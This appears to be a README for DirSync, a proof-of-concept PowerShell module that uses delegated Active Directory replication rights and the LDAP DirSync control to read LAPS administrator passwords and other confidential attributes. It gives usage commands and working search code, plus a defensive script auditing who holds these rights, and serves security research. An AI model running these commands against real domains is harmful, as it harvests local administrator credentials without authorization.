DirSync is a simple proof of concept PowerShell module to demonstrate the impact of delegating DS-Replication-Get-Changes and DS-Replication-Get-Changes-In-Filtered-Set.
DS-Replication-Get-Changes allows reading the value of confidential attributes. DS-Replication-Get-Changes-In-Filtered-Set, coupled with DS-Replication-Get-Changes, allows reading the value of confidential and Read-Only Domain Controller (RODC) filtered attributes, such as Local Administrator Password Solution's (LAPS) ms-Mcs-AdmPwd.
See technical details at https://simondotsh.com/infosec/2022/07/11/dirsync.html.
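The practical question these two rights raise is who holds them. The following is an added example, not part of DirSync, that lists the principals granted the replication extended rights on the domain head, where they are normally delegated. It assumes the ActiveDirectory module (and its AD: drive) is available and that the caller can read the domain object's ACL. It also checks DS-Replication-Get-Changes-All, which the module does not use but which is delegated in the same place and is worth reviewing at the same time.

```powershell
# Added example (not the DirSync module's code): audit who holds the replication
# extended rights on the domain naming context. Assumes the ActiveDirectory module.
Import-Module ActiveDirectory

# rightsGuid values of the controlAccessRight objects in the AD schema.
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

function Get-ReplicationRightHolders {
    param([string]$DomainDN = (Get-ADDomain).DistinguishedName)

    $acl = Get-Acl -Path "AD:\$DomainDN"
    $findings = foreach ($ace in $acl.Access) {
        # Only Allow ACEs that carry an extended right can grant these.
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if (-not $ace.ActiveDirectoryRights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight)) { continue }
        # ObjectType is the GUID of the specific extended right; a GUID of all zeros
        # means "all extended rights" and is reported as such.
        $guid = $ace.ObjectType.ToString()
        if ($ace.ObjectType -eq [guid]::Empty) {
            $name = 'All extended rights'
        } else {
            $name = $ReplicationRights[$guid]
            if (-not $name) { continue }
        }
        [pscustomobject]@{
            Identity  = $ace.IdentityReference.Value
            Right     = $name
            Inherited = $ace.IsInherited
        }
    }
    return $findings
}

$holders = Get-ReplicationRightHolders
$holders | Sort-Object Identity, Right | Format-Table -AutoSize

# A principal holding Get-Changes plus Get-Changes-In-Filtered-Set (or all extended
# rights) can read RODC filtered attributes such as ms-Mcs-AdmPwd via Sync-LAPS.
foreach ($group in ($holders | Group-Object Identity)) {
    $rights = @($group.Group.Right)
    $canSyncFiltered = ($rights -contains 'All extended rights') -or
        (($rights -contains 'DS-Replication-Get-Changes') -and
         ($rights -contains 'DS-Replication-Get-Changes-In-Filtered-Set'))
    if ($canSyncFiltered) {
        Write-Warning "$($group.Name) can synchronize RODC filtered attributes through the DirSync control"
    }
}
```

The output lists direct ACEs only; membership in a listed group (Domain Controllers, Enterprise Domain Controllers and the built-in administrative groups appear by default) is what matters for a given user, so resolve group membership separately before concluding that an account is or is not affected.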
Import-Module .\DirSync.psm1
Uses the DirSync LDAP control to synchronize Legacy Microsoft LAPS' attribute ms-Mcs-AdmPwd and Windows LAPS' msLAPS-Password. Requires DS-Replication-Get-Changes and DS-Replication-Get-Changes-In-Filtered-Set.
Sync-LAPS
Sync-LAPS -Server dc.contoso.com -Username Administrator -Password Password1$ -Domain contoso.com
Sync-LAPS -LDAPFilter '(samaccountname=workstation01$)'
Synchronize the LAPS password of all computer accounts over LDAPS, and ignore certificate validation.
Sync-LAPS -UseLDAPS -IgnoreCert
Uses the DirSync LDAP control to synchronize any requested attribute(s), in particular confidential and RODC filtered ones. Requires DS-Replication-Get-Changes for confidential attributes, and additionally DS-Replication-Get-Changes-In-Filtered-Set for RODC filtered attributes.
The usage is identical to Sync-LAPS, except that it requires -LDAPFilter and -Attributes.
Sync-Attributes -LDAPFilter '(samaccountname=unix_user)' -Attributes unixUserPassword
Sync-Attributes -LDAPFilter '(samaccountname=unix_user)' -Attributes unixUserPassword,description
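To show what Sync-LAPS and Sync-Attributes do underneath, here is an added example, written for this page and not taken from the module, of an LDAP search that carries the DirSync control using System.DirectoryServices.Protocols. The function name Invoke-DirSyncSearch and its parameters are this example's own; the host name and DN in the usage line are placeholders. The DirSync control only accepts a naming-context root (here the domain DN) as search base, and the DC pages results through the cookie in the response control, so the loop keeps sending the returned cookie until MoreData is false.

```powershell
# Added example (not the DirSync module's code): a minimal DirSync-control search.
Add-Type -AssemblyName System.DirectoryServices.Protocols

function Invoke-DirSyncSearch {
    param(
        [Parameter(Mandatory)][string]$Server,
        [Parameter(Mandatory)][string]$DomainDN,      # naming-context root, e.g. DC=contoso,DC=com
        [Parameter(Mandatory)][string]$LDAPFilter,
        [Parameter(Mandatory)][string[]]$Attributes,
        [pscredential]$Credential,
        [switch]$UseLDAPS,
        [switch]$IgnoreCert
    )

    $port = if ($UseLDAPS) { 636 } else { 389 }
    $identifier = New-Object -TypeName System.DirectoryServices.Protocols.LdapDirectoryIdentifier -ArgumentList $Server, $port
    if ($Credential) {
        $conn = New-Object -TypeName System.DirectoryServices.Protocols.LdapConnection -ArgumentList $identifier, $Credential.GetNetworkCredential()
    } else {
        $conn = New-Object -TypeName System.DirectoryServices.Protocols.LdapConnection -ArgumentList $identifier
    }
    $conn.SessionOptions.ProtocolVersion = 3
    $conn.SessionOptions.SecureSocketLayer = [bool]$UseLDAPS
    if ($IgnoreCert) {
        # Accept any server certificate; only for lab use.
        $conn.SessionOptions.VerifyServerCertificate = { param($connection, $certificate) $true }
    }
    $conn.AuthType = [System.DirectoryServices.Protocols.AuthType]::Negotiate
    $conn.Bind()

    $cookie = $null
    $results = New-Object System.Collections.Generic.List[object]
    do {
        $request = New-Object System.DirectoryServices.Protocols.SearchRequest
        $request.DistinguishedName = $DomainDN
        $request.Filter = $LDAPFilter
        $request.Scope = [System.DirectoryServices.Protocols.SearchScope]::Subtree
        $request.Attributes.AddRange($Attributes)

        # With Option = None (no LDAP_DIRSYNC_OBJECT_SECURITY), the DC enforces the
        # replication rights on the naming context rather than per-attribute read
        # permissions, which is what exposes confidential and RODC filtered values.
        $control = New-Object System.DirectoryServices.Protocols.DirSyncRequestControl
        $control.Option = [System.DirectoryServices.Protocols.DirectorySynchronizationOptions]::None
        if ($cookie) { $control.Cookie = $cookie }
        $null = $request.Controls.Add($control)

        $response = $conn.SendRequest($request)
        foreach ($entry in $response.Entries) {
            $row = [ordered]@{ DistinguishedName = $entry.DistinguishedName }
            foreach ($attr in $Attributes) {
                # Attributes without a value (or not readable) are simply absent.
                if ($entry.Attributes.Contains($attr)) {
                    $row[$attr] = ($entry.Attributes[$attr].GetValues([string])) -join ';'
                } else {
                    $row[$attr] = $null
                }
            }
            $results.Add([pscustomobject]$row)
        }

        $dirSync = $response.Controls | Where-Object { $_ -is [System.DirectoryServices.Protocols.DirSyncResponseControl] }
        $cookie = $dirSync.Cookie
    } while ($dirSync -and $dirSync.MoreData)

    $conn.Dispose()
    return $results
}

# Usage (placeholder names):
# Invoke-DirSyncSearch -Server dc.contoso.com -DomainDN 'DC=contoso,DC=com' `
#     -LDAPFilter '(samaccountname=workstation01$)' -Attributes ms-Mcs-AdmPwd, msLAPS-Password
```

If the bound account lacks DS-Replication-Get-Changes, the DC rejects the control with an insufficient-rights error rather than silently returning fewer attributes; if it holds Get-Changes but not Get-Changes-In-Filtered-Set, RODC filtered attributes such as ms-Mcs-AdmPwd are omitted from the entries while confidential ones are returned, which is a quick way to tell the two delegations apart from the client side.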
Thank you to @marcan2020 for his usual code reviews.
See the LICENSE file for legal wording. Essentially it is MIT, meaning that I cannot be held responsible for whatever results from using this code, and do not offer any warranty. By agreeing to this, you are free to use and do anything you like with the code.